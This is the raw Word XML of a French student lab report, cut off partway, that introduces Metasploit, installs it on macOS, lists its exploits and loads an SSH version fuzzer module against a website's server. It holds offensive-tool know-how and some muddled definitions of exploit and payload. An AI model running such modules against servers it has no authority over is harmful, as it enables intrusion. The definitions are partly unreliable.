      <w:bookmarkStart w:id="0" w:name="_Toc197957002"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Présentation </w:t>
      </w:r>
      <w:r w:rsidR="00CD33BC">
        <w:t xml:space="preserve">et Explication </w:t>
      </w:r>
      <w:r>
        <w:t>de Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5F954851" w14:textId="0505A04A" w:rsidR="003029A2" w:rsidRPr="00D6524A" w:rsidRDefault="006C356C" w:rsidP="006C356C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="006C356C">
        <w:t>Le Framework Metasploit est l'un des outils de test les plus utiles dont disposent les professionnels de la sécurité (les pentesters)</w:t>
      </w:r>
      <w:r w:rsidR="003029A2" w:rsidRPr="00D6524A">
        <w:t>. Il contient une base de données d'exploits, qui sont des codes profitant de failles connues, et permet d'envoyer des payloads, comme des backdoors, pour prendre le contrôle à distance. Les pentesters l'utilisent légalement pour identifier les vulnérabilités avant les pirates, mais il peut aussi être détourné à des fins malveillantes. Metasploit existe en version gratuite (Framework) et payante (Pro), et fonctionne via des commandes ou une interface graphique. Avant toute attaque, une phase de reconnaissance (comme un scan) est nécessaire pour cibler les failles. Une fois l'exploit lancé, des outils comme Meterpreter permettent de maintenir l'accès et d'effectuer des actions post-exploitation, comme voler des données. Son utilisation doit toujours être éthique et autorisée, car elle peut avoir des conséquences graves si elle est mal employée. C'est un outil indispensable pour comprendre les menaces et renforcer la sécurité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BA5797" w14:textId="7E2D686C" w:rsidR="00DD6201" w:rsidRPr="00CD33BC" w:rsidRDefault="00A144BF" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15299B58" w14:textId="5CD4358E" w:rsidR="002A1AA2" w:rsidRPr="00D22572" w:rsidRDefault="00CD33BC" w:rsidP="00A144BF">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc197957003"/>
      <w:r w:rsidRPr="00D22572">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Suivi, test et détail d</w:t>
      </w:r>
      <w:r w:rsidR="00D22572">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>’un</w:t>
      </w:r>
      <w:r w:rsidRPr="00D22572">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> tutoriel</w:t>
      </w:r>
      <w:r w:rsidR="00D22572">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D22572">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4CDA212E" w14:textId="506A1F43" w:rsidR="00E02162" w:rsidRPr="00D157E9" w:rsidRDefault="00DA7E95" w:rsidP="00D6524A">
      <w:r w:rsidRPr="00D157E9">
        <w:t xml:space="preserve">Metasploit est un Framework, un ensemble de nombreux logiciels. On peut collecter des informations, créer des logiciels malveillants, pirater des FTP, pirater Android…etc. Nmap est également intégré à Metasploit, on peut utiliser nmap dans </w:t>
      </w:r>
      <w:r w:rsidR="00AE7596" w:rsidRPr="00D157E9">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D157E9">
        <w:t xml:space="preserve"> sans avoir besoin d’ouvrir un nouveau terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C1CA8" w14:textId="27992DFD" w:rsidR="00240A6F" w:rsidRPr="004A1810" w:rsidRDefault="00240A6F" w:rsidP="004A1810">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc197957004"/>
      <w:r w:rsidRPr="004A1810">
        <w:t>Définitions et Avant-Propos :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="3D4080DF" w14:textId="101837DA" w:rsidR="00E02162" w:rsidRPr="00240A6F" w:rsidRDefault="00E02162" w:rsidP="00240A6F">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc197957005"/>
      <w:r w:rsidRPr="00240A6F">
        <w:t>Premièrement, qu’est-ce qu’un exploit ?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0C88F82F" w14:textId="79923FC6" w:rsidR="00F31173" w:rsidRDefault="00F31173" w:rsidP="00D6524A">
      <w:r>
        <w:t>Dans Metasploit, exploit signifie exploiter. On peut explorer le système à l’aide d’un exploit si on a installé un shell inversé sur la machine cible.</w:t>
      </w:r>
      <w:r w:rsidR="00240A6F">
        <w:t xml:space="preserve"> De plus, on a près de 1600 exploits disponibles dans Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B6FAD7" w14:textId="77777777" w:rsidR="00240A6F" w:rsidRDefault="00240A6F" w:rsidP="00D6524A"/>
    <w:p w14:paraId="17F0DD64" w14:textId="64A3AA44" w:rsidR="00FA7B10" w:rsidRPr="00FA7B10" w:rsidRDefault="00240A6F" w:rsidP="00FA7B10">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc197957006"/>
      <w:r>
        <w:t>Qu’est-ce que le payload ?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3C1AA0FB" w14:textId="3854B458" w:rsidR="00240A6F" w:rsidRDefault="00240A6F" w:rsidP="00D6524A">
      <w:r>
        <w:t>Le payload est le bout de code permettant de pirater le système cible, et l’exploit aide à tout faire avec la machine piratée, ce qui va permettre de créer un virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F14BE9D" w14:textId="77777777" w:rsidR="00240A6F" w:rsidRDefault="00240A6F" w:rsidP="00D6524A"/>
    <w:p w14:paraId="15AAC3DF" w14:textId="0ECAD4BE" w:rsidR="00240A6F" w:rsidRPr="00240A6F" w:rsidRDefault="00240A6F" w:rsidP="00D157E9">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc197957007"/>
      <w:r>
        <w:t>Vocabulaire important avant de commencer ce TP :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="7EFD1FEE" w14:textId="77777777" w:rsidR="00240A6F" w:rsidRDefault="00240A6F" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>LHOST : lhost est l’adresse IP de l’attaquant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBEF3F5" w14:textId="77777777" w:rsidR="00240A6F" w:rsidRDefault="00240A6F" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>LPORT : C’est le port que vous souhaitez utiliser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA1D9A4" w14:textId="77777777" w:rsidR="00240A6F" w:rsidRDefault="00240A6F" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RHOST : Ceci est l’adresse IP de la machine victime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA48E11" w14:textId="02246AD1" w:rsidR="00E02162" w:rsidRDefault="00240A6F" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RPORT : Le numéro de port de la victime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A5BD61" w14:textId="1B694AF0" w:rsidR="004A1810" w:rsidRDefault="004A1810" w:rsidP="004A1810">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc197957008"/>
      <w:r>
        <w:t>Commençons Metasploit :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0AC1DF52" w14:textId="4E8A7D1B" w:rsidR="006D72A4" w:rsidRDefault="00A7319C" w:rsidP="00D6524A">
      <w:r>
        <w:t xml:space="preserve">Pour ce TP, </w:t>
      </w:r>
      <w:r w:rsidR="00D22572">
        <w:t>tout est fait</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MacOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, donc pour installer Metasploit, </w:t>
      </w:r>
      <w:r w:rsidR="00D22572">
        <w:t>nous allons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> utiliser Homebrew.</w:t>
      </w:r>
      <w:r w:rsidR="005D2A0D">
        <w:t xml:space="preserve"> Et utiliser la commande suivante du coup pour installer Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00D22572">
        <w:t>, o</w:t>
      </w:r>
      <w:r w:rsidR="00115706" w:rsidRPr="00115706">
        <w:t xml:space="preserve">uvrons un terminal avant tout </w:t>
      </w:r>
      <w:r w:rsidR="00D22572">
        <w:t>et i</w:t>
      </w:r>
      <w:r w:rsidR="006D72A4">
        <w:t xml:space="preserve">nstallons déjà </w:t>
      </w:r>
      <w:r w:rsidR="00D22572">
        <w:t>Homeb</w:t>
      </w:r>
      <w:r w:rsidR="006D72A4">
        <w:t>rew</w:t>
      </w:r>
      <w:r w:rsidR="00D22572">
        <w:t xml:space="preserve"> si ce n’est pas déjà fait</w:t>
      </w:r>
      <w:r w:rsidR="006D72A4">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8890C6" w14:textId="77777777" w:rsidR="00D22572" w:rsidRDefault="00D22572" w:rsidP="00D6524A"/>
    <w:p w14:paraId="2AF35669" w14:textId="4DCB13A6" w:rsidR="006D72A4" w:rsidRPr="001D4079" w:rsidRDefault="006D72A4" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4079">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/bash -c "$(curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4079">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fsSL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4079">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00D157E9" w:rsidRPr="001D4079">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001D4079">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A78A077" w14:textId="77777777" w:rsidR="00D157E9" w:rsidRPr="001D4079" w:rsidRDefault="00D157E9" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C842CE" w14:textId="51D749DE" w:rsidR="00D157E9" w:rsidRPr="00D157E9" w:rsidRDefault="00D157E9" w:rsidP="00D6524A">
      <w:r w:rsidRPr="00D157E9">
        <w:t>Puis installons Metasploit avec la commande suivante :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D13C626" w14:textId="3D477C4C" w:rsidR="00D157E9" w:rsidRDefault="00D157E9" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>brew install metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9478F4" w14:textId="6464B6A7" w:rsidR="0004792B" w:rsidRPr="0004792B" w:rsidRDefault="0004792B" w:rsidP="00D6524A">
      <w:r w:rsidRPr="0004792B">
        <w:t xml:space="preserve">Utiliser la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C2EB6" w14:textId="54E8B49D" w:rsidR="00D6524A" w:rsidRDefault="0004792B" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00D157E9">
        <w:t>service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1795671F" w14:textId="77777777" w:rsidR="00EE4DF8" w:rsidRPr="00D157E9" w:rsidRDefault="00EE4DF8" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61805F9B" w14:textId="77777777" w:rsidR="0004792B" w:rsidRPr="0004792B" w:rsidRDefault="0004792B" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D157E9">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0004792B">
        <w:t>Ça va aider à faire tourner Metasploit plus facilement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285AA47C" w14:textId="77777777" w:rsidR="0004792B" w:rsidRPr="00115706" w:rsidRDefault="0004792B" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB38A0C" w14:textId="4D0A7F56" w:rsidR="00115706" w:rsidRDefault="00115706" w:rsidP="00D6524A">
      <w:r>
        <w:t xml:space="preserve">Puis, lançons </w:t>
      </w:r>
      <w:r w:rsidR="0004792B">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> avec la commande suivante : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC6A132" w14:textId="04A8F8A1" w:rsidR="00115706" w:rsidRDefault="00697077" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00E21AFD">
        <w:t>sfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE752B1" w14:textId="2E33059D" w:rsidR="00FA7B10" w:rsidRDefault="001C2036" w:rsidP="00D6524A">
      <w:r w:rsidRPr="001C2036">
        <w:t>Si tout marche comme il le faut cela donnera</w:t>
      </w:r>
      <w:r w:rsidR="00EE4DF8">
        <w:t xml:space="preserve"> ceci</w:t>
      </w:r>
      <w:r w:rsidRPr="001C2036">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA803D" w14:textId="77777777" w:rsidR="002B06FD" w:rsidRDefault="001C2036" w:rsidP="00D6524A">
      <w:r w:rsidRPr="001C2036">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66734158" wp14:editId="23612751">
            <wp:extent cx="5760720" cy="3099435"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1988922366"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22366" name="Image 1" descr="Une image contenant texte, capture d’écran, Police, conception&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3099435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="334DEA6F" w14:textId="1024EE7A" w:rsidR="00D72A8C" w:rsidRDefault="002B06FD" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3DF2F2" w14:textId="0703CB78" w:rsidR="00F83AA1" w:rsidRPr="00EE4DF8" w:rsidRDefault="00C94B0C" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0E2841" w:themeColor="text2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Affichons maintenant les différents exploits</w:t>
      </w:r>
      <w:r w:rsidR="00722080">
        <w:t xml:space="preserve"> avec la commande</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EE0BCD" w14:textId="15D851A4" w:rsidR="00722080" w:rsidRDefault="005137EF" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>Show exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E56B65" w14:textId="77777777" w:rsidR="00183D85" w:rsidRDefault="00183D85" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00183D85">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17673F38" wp14:editId="13AEA335">
            <wp:extent cx="5991046" cy="3647326"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="379301905" name="Image 1" descr="Une image contenant texte, capture d’écran,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01905" name="Image 1" descr="Une image contenant texte, capture d’écran, menu&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6013684" cy="3661108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFBE0EB" w14:textId="6A695407" w:rsidR="005137EF" w:rsidRPr="00A4655E" w:rsidRDefault="00183D85" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
      </w:pPr>
      <w:r w:rsidRPr="00A4655E">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A4655E">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A4655E">
        <w:t xml:space="preserve"> : les exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED36132" w14:textId="77777777" w:rsidR="00722080" w:rsidRDefault="00722080" w:rsidP="00D6524A"/>
    <w:p w14:paraId="5041E6DF" w14:textId="77777777" w:rsidR="00534844" w:rsidRPr="00F83AA1" w:rsidRDefault="00534844" w:rsidP="00D6524A"/>
    <w:p w14:paraId="7585A6E9" w14:textId="0B4331C2" w:rsidR="001C2036" w:rsidRDefault="00A4655E" w:rsidP="00D6524A">
      <w:r>
        <w:t>On va récupérer des informations sur un serveur d’un site web</w:t>
      </w:r>
      <w:r w:rsidR="0015613F">
        <w:t xml:space="preserve">. Pour cela, on doit utiliser </w:t>
      </w:r>
      <w:r w:rsidR="00EE4DF8">
        <w:t>l’exploit</w:t>
      </w:r>
      <w:r w:rsidR="0015613F">
        <w:t xml:space="preserve"> SSH_Version</w:t>
      </w:r>
      <w:r w:rsidR="00D72A8C">
        <w:t>, utilisons la commande suivante</w:t>
      </w:r>
      <w:r w:rsidR="00EE4DF8">
        <w:t xml:space="preserve"> pour chercher cet exploit</w:t>
      </w:r>
      <w:r w:rsidR="00D72A8C">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B4896" w14:textId="60542A28" w:rsidR="00D72A8C" w:rsidRDefault="00D72A8C" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C10BE46" w14:textId="77777777" w:rsidR="00D72A8C" w:rsidRDefault="00D72A8C" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72A8C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30DE242A" wp14:editId="6F5CE568">
            <wp:extent cx="5760720" cy="1692275"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="705769581"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69581" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1692275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E94B5C" w14:textId="4BA90347" w:rsidR="00D72A8C" w:rsidRPr="004A26B8" w:rsidRDefault="00D72A8C" w:rsidP="00C74497">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004A26B8">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004A26B8">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004A26B8">
        <w:t xml:space="preserve"> : Cela affiche tous les exploits en rapport avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A26B8">
        <w:t>SSH_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A26B8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3BF8C5" w14:textId="77777777" w:rsidR="00C74497" w:rsidRDefault="00C74497" w:rsidP="00D6524A"/>
    <w:p w14:paraId="210B60B8" w14:textId="70C35F47" w:rsidR="004A26B8" w:rsidRDefault="008C0046" w:rsidP="00D6524A">
      <w:r>
        <w:t>On va utiliser ici ssh_version15, sachant que pour utiliser n’importe quel exploit, il suffit d’entrer :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531C737F" w14:textId="5355C63F" w:rsidR="008C0046" w:rsidRDefault="008C0046" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>Use [nom de l’exploit]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50B765" w14:textId="03E440FF" w:rsidR="008C0046" w:rsidRPr="008C0046" w:rsidRDefault="008C0046" w:rsidP="00D6524A">
      <w:r w:rsidRPr="008C0046">
        <w:t xml:space="preserve">Donc faisons cela : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F68CDAF" w14:textId="661D6A5E" w:rsidR="008C0046" w:rsidRDefault="008C0046" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0046">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use auxiliary/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C0046">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fuzzers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C0046">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ssh/ssh_version_15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F3A22" w14:textId="77777777" w:rsidR="00516669" w:rsidRDefault="00516669" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4723A47D" w14:textId="77777777" w:rsidR="00516669" w:rsidRDefault="00516669" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00516669">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F25E65E" wp14:editId="3C036470">
            <wp:extent cx="5105400" cy="482600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20499811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81187" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5105400" cy="482600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="642C9FB8" w14:textId="71CFC7AE" w:rsidR="008C0046" w:rsidRPr="001E14C5" w:rsidRDefault="00516669" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E14C5">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
